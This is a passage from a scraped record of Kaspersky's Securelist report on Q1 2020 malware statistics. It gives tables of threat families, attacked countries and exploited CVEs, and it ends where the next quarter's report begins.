\n3 | Bangladesh | 18.58 \n4 | Nigeria | 15.58 \n5 | Lebanon | 15.28 \n6 | Tunisia | 14.94 \n7 | Pakistan | 13.99 \n8 | Kuwait | 13.91 \n9 | Indonesia | 13.81 \n10 | Cuba | 13.62 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, the leader by share of attacked users was Iran (39.56%). Inhabitants of this country most frequently encountered adware apps from the Notifyer family, as well as Telegram clone apps. In second place was Algeria (21.44%), where adware apps were also distributed, but this time it was the HiddenAd and FakeAdBlocker families. Third place was taken by Bangladesh (18.58%), where half of the top 10 mobile threats consisted of adware in the HiddenAd family.\n\n### Mobile banking trojans\n\nDuring the reporting period, we detected **42,115** installation packages of mobile banking trojans. This is the highest value in the past 18 months, and more than 2.5 times higher than in Q4 2019. The largest contributions to the statistics came from the Trojan-Banker.AndroidOS.Agent (42.79% of all installation packages detected), Trojan-Banker.AndroidOS.Wroba (16.61%), and Trojan-Banker.AndroidOS.Svpeng (13.66%) families.\n\n_Number of installation packages of mobile banking trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194342/sl_malware_report_04-kolichestvo-ustanovochnyh-paketov-mobilnyh-bankovskih-troyancev-q1-2019-q1-2019.png>)_\n\n**Top 10 mobile banking trojans**\n\n_ _ | **Verdict** | **%*** \n---|---|--- \n_1_ | Trojan-Banker.AndroidOS.Rotexy.e | 13.11 \n_2_ | Trojan-Banker.AndroidOS.Svpeng.q | 10.25 \n_3_ | Trojan-Banker.AndroidOS.Asacub.snt | 7.64 \n_4_ | Trojan-Banker.AndroidOS.Asacub.ce | 6.31 \n_5_ | Trojan-Banker.AndroidOS.Agent.eq | 5.70 \n_6_ | Trojan-Banker.AndroidOS.Anubis.san | 4.68 \n_7_ | Trojan-Banker.AndroidOS.Agent.ep | 3.65 \n_8_ | Trojan-Banker.AndroidOS.Asacub.a | 3.50 \n_9_ | Trojan-Banker.AndroidOS.Asacub.ar | 3.00 \n_10_ | Trojan-Banker.AndroidOS.Agent.cf | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by banking threats._\n\nFirst and second places in our top 10 were claimed by trojans targeted at Russian-speaking mobile users: Trojan-Banker.AndroidOS.Rotexy.e (13.11%) and Trojan-Banker.AndroidOS.Svpeng.q (10.25%).\n\nThird, fourth, eighth, and ninth positions in the top 10 mobile banking threats went to members of the Asacub family. The cybercriminals behind this trojan stopped creating new samples, but its distribution channels were still active in Q1.\n\n_Geography of mobile banking threats, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194517/sl_malware_report_05-en-mobile-banker-map.png>)_\n\n**Top 10 countries by share of users attacked by mobile banking trojans**\n\n| Country* | %** \n---|---|--- \n1 | Japan | 0.57 \n2 | Spain | 0.48 \n3 | Italy | 0.26 \n4 | Bolivia | 0.18 \n5 | Russia | 0.17 \n6 | Turkey | 0.13 \n7 | Tajikistan | 0.13 \n8 | Brazil | 0.11 \n9 | Cuba | 0.11 \n10 | China | 0.10 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile banking trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nIn Q1 2020, Japan (0.57%) had the largest share of users attacked by mobile bankers; the vast majority of cases involved Trojan-Banker.AndroidOS.Agent.eq.\n\nIn second place came Spain (0.48%), where in more than half of all cases, we detected malware from the Trojan-Banker.AndroidOS.Cebruser family, and another quarter of detections were members of the Trojan-Banker.AndroidOS.Ginp family.\n\nThird place belonged to Italy (0.26%), where, as in Spain, the Trojan-Banker.AndroidOS.Cebruser family was the most widespread with almost two-thirds of detections.\n\nIt is worth saying a bit more about the Cebruser family. Its creators were among the first to exploit the coronavirus topic to spread the malware.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13183112/sl_malware_report.png>)When it runs, the trojan immediately gets down to business: it requests access to Accessibility Services to obtain Device Admin permissions, and then tries to get hold of card details.\n\nThe malware is distributed under the [Malware-as-a-Service](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) model; its set of functions is standard for such threats, but with one interesting detail \u2014 the use of a step-counter for activation so as to bypass dynamic analysis tools ([sandbox](<https://encyclopedia.kaspersky.com/glossary/sandbox/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)). Cebruser targets the mobile apps of banks in various countries and popular non-financial apps; its main weapons are phishing windows and interception of two-factor authorization. In addition, the malware can block the screen using a ransomware tool and intercept keystrokes on the virtual keyboard.\n\n### Mobile ransomware trojans\n\nIn Q2 2020, we detected **4,339** installation packages of mobile trojan ransomware, 1,067 fewer than in the previous quarter.\n\n_Number of installation packages of mobile ransomware trojans detected by Kaspersky, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194615/sl_malware_report_06-kolichestvo-ustanovochnyh-paketov-mobilnyh-troyancev-vymogatelej-q1-2018-q1-2019.png>)_\n\n**Top 10 mobile ransomware trojans**\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 17.08 \n2 | Trojan-Ransom.AndroidOS.Congur.e | 12.70 \n3 | Trojan-Ransom.AndroidOS.Small.as | 11.41 \n4 | Trojan-Ransom.AndroidOS.Rkor.k | 9.88 \n5 | Trojan-Ransom.AndroidOS.Small.as | 7.32 \n6 | Trojan-Ransom.AndroidOS.Small.o | 4.79 \n7 | Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 \n8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 \n9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 \n10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._\n\nOver the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.\n\n_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_\n\nTop 10 countries by share of users attacked by mobile ransomware trojans:\n\n| **Country*** | **%**** \n---|---|--- \n1 | USA | 0.26 \n2 | Kazakhstan | 0.25 \n3 | Iran | 0.16 \n4 | China | 0.09 \n5 | Saudi Arabia | 0.08 \n6 | Italy | 0.03 \n7 | Mexico | 0.03 \n8 | Canada | 0.03 \n9 | Indonesia | 0.03 \n10 | Switzerland | 0.03 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nThe leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nIn Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware's operating principle is simple: it calls the C&C for a shell script, which it then downloads and executes.\n\n### Top 20 threats to macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 \n2 | AdWare.OSX.Pirrit.j | 10.34 \n3 | AdWare.OSX.Cimpli.k | 6.69 \n4 | AdWare.OSX.Ketin.h | 6.27 \n5 | AdWare.OSX.Pirrit.aa | 5.75 \n6 | AdWare.OSX.Pirrit.o | 5.74 \n7 | AdWare.OSX.Pirrit.x | 5.18 \n8 | AdWare.OSX.Spc.a | 4.56 \n9 | AdWare.OSX.Cimpli.f | 4.25 \n10 | AdWare.OSX.Bnodlero.t | 4.08 \n11 | AdWare.OSX.Bnodlero.x | 3.74 \n12 | Hoax.OSX.SuperClean.gen | 3.71 \n13 | AdWare.OSX.Cimpli.h | 3.37 \n14 | AdWare.OSX.Pirrit.v | 3.30 \n15 | AdWare.OSX.Amc.c | 2.98 \n16 | AdWare.OSX.MacSearch.d | 2.85 \n17 | RiskTool.OSX.Spigot.a | 2.84 \n18 | AdWare.OSX.Pirrit.s | 2.80 \n19 | AdWare.OSX.Ketin.d | 2.76 \n20 | AdWare.OSX.Bnodlero.aq | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked_\n\nThe top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.\n\nInterestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.\n\n### Threat geography\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 7.14 \n2 | France | 6.94 \n3 | Italy | 5.94 \n4 | Canada | 5.58 \n5 | USA | 5.49 \n6 | Russia | 5.10 \n7 | India | 4.88 \n8 | Mexico | 4.78 \n9 | Brazil | 4.65 \n10 | Belgium | 4.65 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)_ \n_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%. \n \nSSH | 18.9% \nTelnet | 81.1% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_\n\nIt was a similar situation with control sessions: attackers often controlled infected traps via telnet. \n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 \nBackdoor.Linux.Gafgyt.av | 0.35 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nIn Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.\n\n_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_\n\n**Attack geography**\n\nTo assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Uzbekistan | 10.5 \n2 | Tajikistan | 6.9 \n3 | Turkmenistan | 5.5 \n4 | Afghanistan | 5.1 \n5 | Yemen | 3.1 \n6 | Kazakhstan | 3.0 \n7 | Guatemala | 2.8 \n8 | Syria | 2.4 \n9 | Sudan | 2.1 \n10 | Kyrgyzstan | 2.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 | \n2 | Zbot | Trojan.Win32.Zbot | 20.8 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 | \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 | \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 | \n6 | Trickster | Trojan.Win32.Trickster | 3.6 | \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 | \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 | \n \n_** Unique users attacked by this malware family as a __percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n \n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 | \n4 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 | \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom,\n\nTrojan-Ransom.Win32.PolyRansom | 2.96 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 | \n| | | | | \n \n_* Unique Kaspersky users __attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n \n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.\n\nIn second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.\n\nVarious network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution, in which regard the attacker does not even need to know the username/password combination (since the error occurs before the authentication stage); however, it is present only in Windows 10. In Remote Desktop Gateway there were found two critical vulnerabilities ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)) enabling an unauthorized user to execute remote code in the target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**_;_ it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet user' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.** **\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers _**_Malware-class_**_ local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally faced at least one **Malware**-class local threat during Q1.", "cvss3": {}, "published": "2020-05-20T10:00:43", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "modified": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-03T13:05:29", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22101624/malware_SL_pic3-990x400.jpg)\n\n**[IT threat evolution Q2 2020. Review](<https://securelist.com/it-threat-evolution-q2-2020/98230/>) \n[IT threat evolution Q2 2020. Mobile statistics](<https://securelist.com/it-threat-evolution-q2-2020-mobile-statistics/98337/>)**\n\n_These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2:\n\n * Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.\n * As many as 286,229,445 unique URLs triggered Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.\n * Ransomware attacks were defeated on the computers of 154,720 unique users.\n * Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.\n\n_Number of unique users attacked by financial malware, Q2 2020 